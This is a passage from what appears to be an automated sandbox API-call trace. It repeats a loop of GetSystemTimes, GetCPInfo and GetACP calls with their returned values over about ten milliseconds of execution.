lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.357] GetACP () returned 0x4e4 [0078.357] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.358] GetACP () returned 0x4e4 [0078.358] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.359] GetACP () returned 0x4e4 [0078.359] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.360] GetACP () returned 0x4e4 [0078.360] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.361] GetACP () returned 0x4e4 [0078.361] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.362] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.362] GetACP () returned 0x4e4 [0078.363] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.363] GetACP () returned 0x4e4 [0078.363] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.363] GetACP () returned 0x4e4 [0078.363] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.363] GetACP () returned 0x4e4 [0078.363] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.363] GetACP () returned 0x4e4 [0078.363] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.364] GetACP () returned 0x4e4 [0078.364] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.365] GetACP () returned 0x4e4 [0078.365] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.366] GetACP () returned 0x4e4 [0078.366] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.367] GetACP () returned 0x4e4 [0078.367] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, 